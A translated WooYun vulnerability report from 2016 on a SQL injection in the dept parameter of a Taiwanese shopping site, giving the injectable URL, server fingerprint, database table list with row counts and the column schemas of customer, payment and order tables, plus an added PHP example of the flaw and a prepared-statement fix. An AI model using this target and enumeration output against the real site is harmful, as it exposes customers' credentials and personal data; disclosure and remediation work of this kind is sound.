
Vulnerability summary

Defect ID: wooyun-2016-0177514

Title: 万事OK (OnceOK) main www site SQL injection can leak millions of records (usernames/passwords/emails/phone numbers/order information/funds, etc.) (Taiwan region)

Vendor: ONCEOK

Author: 暴走

Submitted: 2016-02-21 22:54

Fix time: 2016-02-26 23:00

Disclosed: 2016-02-26 23:00

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: the vendor was notified of the vulnerability but ignored it

Source: http://www.wooyun.org; for questions or help, contact [email protected]



Vulnerability details

Disclosure status:

2016-02-21: Details sent to the vendor, awaiting the vendor's handling
2016-02-26: The vendor actively ignored the vulnerability; details disclosed to the public

Brief description:

SQL Injection Problem.

Detailed description:

Homepage of the 万事OK生活市集 (OnceOK Life Market) main site (http://www.onceok.com.tw/):

1.png

Proof of vulnerability:

SQL injection URL (injected parameter: dept)
http://www.onceok.com.tw/menuitems.php?dept=food&id=

5.png
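An injectable dept parameter points at the usual cause: request input spliced into the SQL text. The following is an added illustration, not code from onceok.com.tw (whose source is not public): a hypothetical reconstruction of that pattern in PHP next to a hardened version using PDO prepared statements. The table name menu_items, its column names, the allow-list of department codes and the connection credentials are all assumptions.

```php
<?php
// Added example, not code from the onceok.com.tw site (its source is not
// public). Hypothetical reconstruction of the pattern behind
//   menuitems.php?dept=food&id=
// and a hardened version. Table name, column names, the allow-list and
// the connection credentials are assumptions.

declare(strict_types=1);

// Placeholder credentials; the database name 'onceok' is the one named
// in the report.
function connect(): PDO
{
    $db = new PDO(
        'mysql:host=127.0.0.1;dbname=onceok;charset=utf8mb4',
        'DB_USER_PLACEHOLDER',
        'DB_PASSWORD_PLACEHOLDER'
    );
    // Use real server-side prepared statements rather than client-side
    // emulation, so bound values never become part of the statement text.
    $db->setAttribute(PDO::ATTR_EMULATE_PREPARES, false);
    $db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    return $db;
}

// --- Vulnerable pattern -------------------------------------------------
// Both query-string values are spliced straight into the SQL text, so the
// caller controls the statement's structure, not just its data. This is
// the shape of code sqlmap exercises when it reports 'dept' as injectable.
function menu_items_vulnerable(PDO $db, array $get): array
{
    $dept = $get['dept'] ?? '';
    $id   = $get['id'] ?? '';
    $sql  = "SELECT id, name, price FROM menu_items "
          . "WHERE dept = '$dept' AND id = '$id'";
    return $db->query($sql)->fetchAll(PDO::FETCH_ASSOC);
}

// --- Hardened version ---------------------------------------------------
// 1. dept is a short category code, so check it against an allow-list
//    before use (defence in depth, and it rejects junk early).
// 2. id is numeric: validate it as an integer, reject anything else.
// 3. Pass both values as bound parameters; the SQL text stays constant.
const ALLOWED_DEPTS = ['food', 'drink', 'gift'];   // constructed sample list

function menu_items_safe(PDO $db, array $get): array
{
    $dept = $get['dept'] ?? '';
    if (!is_string($dept) || !in_array($dept, ALLOWED_DEPTS, true)) {
        throw new InvalidArgumentException('unknown dept');
    }

    // filter_var returns false for '', non-numeric strings and arrays.
    $id = filter_var($get['id'] ?? '', FILTER_VALIDATE_INT);
    if ($id === false) {
        throw new InvalidArgumentException('id must be an integer');
    }

    $stmt = $db->prepare(
        'SELECT id, name, price FROM menu_items WHERE dept = :dept AND id = :id'
    );
    $stmt->bindValue(':dept', $dept, PDO::PARAM_STR);
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Request shaped like the one in the report: id is empty, which the
// hardened version rejects before any SQL is sent to the server.
$db = connect();
try {
    $rows = menu_items_safe($db, ['dept' => 'food', 'id' => '']);
} catch (InvalidArgumentException $e) {
    error_log('rejected request: ' . $e->getMessage());
}
```

The example is written for current PHP, but the report fingerprints the server as PHP 5.1.6, and PDO with bound parameters has shipped with PHP since 5.1, so this fix did not depend on a platform upgrade.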


current-db: onceok, containing 148 tables and millions of rows

Linux CentOS 4.9
web application technology: Apache 2.0.52, PHP 5.1.6
back-end DBMS: MySQL >= 5.0.0
Database: onceok
+----------------------------------+---------+
| Table | Entries |
+----------------------------------+---------+
| tb_ok_search | 1360718 |
| pagetrack | 372247 |
| tb_ok_order_status_log | 221458 |
| tb_ok_stock | 214566 |
| orders_items | 140758 |
| tb_ok_shipment_d | 92416 |
| tb_ok_customer_login_log | 85001 |
| tb_ok_also_purchased_temp_items | 69125 |
| tb_ok_goods_sales_day | 53384 |
| view_ok_goods_sales_day | 53384 |
| tb_ok_also_purchased_match | 49622 |
| tb_ok_also_purchased_temp_match | 49622 |
| tb_ok_atm_file_contain | 45951 |
| tb_ok_http_referer | 42545 |
| customers | 41587 |
| tb_ok_credit_debug_log | 41415 |
| tb_ok_goods_sales_week | 40497 |
| view_ok_goods_sales_week | 40497 |
| orders_info | 39810 |
| epaper | 37597 |
| tb_ok_goods_log | 36855 |
| orders_infobak | 32609 |
| view_ok_customer_order | 28387 |
| tb_ok_debug_logs | 28327 |
| tb_ok_shipment_m | 27792 |
| view_ok_ship_return | 27792 |
| view_ok_ship_item_check | 27357 |
| view_ok_order_item_check | 27316 |
| tb_ok_goods_sales_month | 26218 |
| view_ok_goods_sales_month | 26218 |
| invo_prt | 25661 |
| tb_ok_money_log | 25092 |
| tb_ok_users_log | 24086 |
| tb_ok_customer_order | 23723 |
| shopping_cart | 19203 |
| goods_inventory_log | 17896 |
| tb_ok_atm_file | 17415 |
| tb_ok_http_referer_order | 17392 |
| view_ok_http_referer_order | 17392 |
| customers_epaper | 16372 |
| customers_fix | 15634 |
| tb_ok_also_purchased_order | 15299 |
| view_ok_money | 15190 |
| company_contacts | 9772 |
| tb_ok_order_rec | 9554 |
| tb_ok_survey | 8800 |
| tb_ok_goods_sales_year | 8053 |
| view_ok_goods_sales_year | 8053 |
| tb_ok_goods_qa | 6855 |
| tb_ok_serial | 6381 |
| tb_ok_store_log | 6210 |
| tb_ok_order_qa | 5704 |
| view_ok_goods_type | 4307 |
| view_ok_goods_sales_all_info | 4298 |
| tb_ok_stores_sales_month | 2835 |
| check_log | 2834 |
| tb_ok_goods_sales_all | 2549 |
| view_ok_goods_sales_all | 2549 |
| pagetrack_transation | 2415 |
| view_ok_stores_type | 2132 |
| orders_full_amount | 1757 |
| tb_ok_serial_test | 1329 |
| tb_ok_user_role | 562 |
| ip_view_pool | 491 |
| tb_ok_idx_temp | 480 |
| tb_ok_cat_temp | 396 |
| tb_ok_scenic | 336 |
| tb_ok_scenic_content | 335 |
| tb_ok_keyword | 291 |
| stores_detail | 264 |
| stores_info | 263 |
| view_ok_store_sales_info | 256 |
| tb_ok_users | 249 |
| goods_inventory | 239 |
| tb_ok_role_ap | 194 |
| view_ok_goods_full_amount | 136 |
| idx_special | 108 |
| tb_ok_return_d | 95 |
| tb_ok_goods_monthly_sales_list | 76 |
| view_ok_goods_monthly_sales_list | 76 |
| idx_choice | 73 |
| tb_ok_ap | 68 |
| invo_range | 54 |
| tb_ok_return_m | 49 |
| blog_type | 42 |
| orders_status | 36 |
| goods_type | 30 |
| invo_lotto | 28 |
| city | 26 |
| forums_topic_type | 26 |
| hot_news | 26 |
| tb_ok_goods_weekly_sales_list | 26 |
| view_ok_goods_weekly_sales_list | 26 |
| goods_subtype | 24 |
| idx_pic_config | 23 |
| tb_ok_freight | 19 |
| tb_ok_http_referer_setup | 12 |
| tb_ok_money_type | 11 |
| tb_ok_role | 11 |
| tb_ok_survey_item | 11 |
| view_search_keywords_yahoo | 11 |
| idx_search | 8 |
| stores_area | 7 |
| tb_ok_return_status | 6 |
| idx_store | 5 |
| tb_ok_banner | 5 |
| forums_topic_status | 4 |
| tb_ok_shipment_status | 4 |
| customer_facebook | 3 |
| depts_info | 3 |
| stores_special | 3 |
| config | 1 |
| invo_reprt | 1 |
| tb_ok_ship_seq | 1 |
+----------------------------------+---------+


Looking for user-related tables:
customers table (contains 41587 users):

Database: onceok
Table: customers
[46 columns]
+----------------+---------------------+
| Column | Type |
+----------------+---------------------+
| position | varchar(10) |
| address | varchar(150) |
| auth | varchar(32) |
| bday | tinyint(3) unsigned |
| birthday | varchar(10) |
| blog | varchar(200) |
| bmonth | tinyint(3) unsigned |
| byear | int(10) unsigned |
| career | varchar(5) |
| cdate | datetime |
| city | varchar(10) |
| CREATE_DATE | datetime |
| CREATE_USER | varchar(100) |
| credit_card | varchar(1) |
| DATESTAMP | datetime |
| description | varchar(100) |
| district | varchar(10) |
| education | varchar(1) |
| email | varchar(100) |
| email_epaper | varchar(1) |
| email_premium | varchar(1) |
| facebook | varchar(50) |
| fax_01 | varchar(16) |
| fax_02 | varchar(16) |
| fburl | varchar(200) |
| free_sepecial | tinyint(4) |
| gender | varchar(1) |
| google | varchar(100) |
| id | varchar(100) |
| identification | varchar(10) |
| income | varchar(10) |
| info | varchar(50) |
| ldate | datetime |
| mobile | varchar(10) |
| name | varchar(20) |
| ok_money_total | int(11) |
| ok_ranking | int(11) |
| password | varchar(60) |
| status | varchar(1) |
| tel_day | varchar(30) |
| tel_night | varchar(16) |
| uid | int(11) unsigned |
| user_id | varchar(100) |
| USERSTAMP | varchar(100) |
| yahoo | varchar(100) |
| zip | varchar(5) |
+----------------+---------------------+


As usual, a few rows were dumped to illustrate. Because there are so many columns, only 4 user records were pulled (including user id, email, phone number, password and so on).



Next, the tb_ok_money_log table (since it has "money" in the name, it is presumably the amounts customers spent).

Database: onceok
Table: tb_ok_money_log
[7 columns]
+-------------+------------------+
| Column | Type |
+-------------+------------------+
| content | varchar(50) |
| create_date | datetime |
| create_user | varchar(50) |
| id | int(10) unsigned |
| ok_money | int(11) |
| otype | char(3) |
| uid | int(11) |
+-------------+------------------+


Several hundred thousand rows, so let's look at a few:



There is also the order table orders_info (several hundred thousand orders, containing all kinds of information... everything you could ask for).

Database: onceok
Table: orders_info
[45 columns]
+-------------------+------------------+
| Column | Type |
+-------------------+------------------+
| AMT | int(6) |
| authcode | varchar(10) |
| CANCEL_DATE | date |
| CANCEL_USER | varchar(20) |
| cdate | datetime |
| CREATE_DATE | datetime |
| CREATE_USER | varchar(50) |
| customer_id | varchar(50) |
| DATESTAMP | datetime |
| description | varchar(200) |
| discount | int(11) |
| err_msg | varchar(100) |
| extra_product | varchar(500) |
| free_full_amount | tinyint(4) |
| free_special | tinyint(4) |
| id | varchar(10) |
| INV_DATE | date |
| INV_DONATE | tinyint(1) |
| INV_NO | varchar(10) |
| INV_SDATE | date |
| INV_TITLE | varchar(50) |
| INV_TYPE | varchar(1) |
| ip_address | varchar(15) |
| memo | varchar(500) |
| NON_TAX_AMT | int(6) |
| ok_money_order | int(11) |
| order_status | varchar(8) |
| order_total | int(8) |
| pay_account | varchar(34) |
| pay_mode | varchar(10) |
| receive_date | date |
| receiver_address | varchar(200) |
| receiver_city | varchar(10) |
| receiver_district | varchar(10) |
| receiver_gender | varchar(1) |
| receiver_mobile | varchar(10) |
| receiver_name | varchar(20) |
| receiver_tel | varchar(30) |
| receiver_time | varchar(1) |
| receiver_zip | varchar(5) |
| TAX | int(6) |
| TAX_ID | varchar(8) |
| uid | int(10) unsigned |
| USERSTAMP | varchar(50) |
| VAMT | int(11) |
+-------------------+------------------+


A few rows from it:



That's about it.

Fix recommendation:

User information has to be protected.

Copyright notice: when reposting, please credit the source: 暴走@乌云


Vulnerability response

Vendor response:

Severity: No impact, vendor ignored

Ignored at: 2016-02-26 23:00

Vendor reply:

Vulnerability Rank: 15 (WooYun rating)

Latest status:

None yet


Vulnerability comments:

Comments

  1. 2016-02-27 13:43 | 牛 小 帅 ( Regular white hat | Rank:1101 Vulns:257 | 1. The most handsome man on WooYun ...)

    So this is the "millions of records", 666

  2. 2016-02-27 15:17 | 暴走 ( Regular white hat | Rank:518 Vulns:95 | Earning Rank on WooYun is like climbing the Dota ladder, if not worse...)

    @牛 小 帅 Just telling it like it is, but it got ignored!

  3. 2016-02-27 17:06 | 牛 小 帅 ( Regular white hat | Rank:1101 Vulns:257 | 1. The most handsome man on WooYun ...)

    @暴走 Those are probably the site's cache records; there are fewer than 50,000 users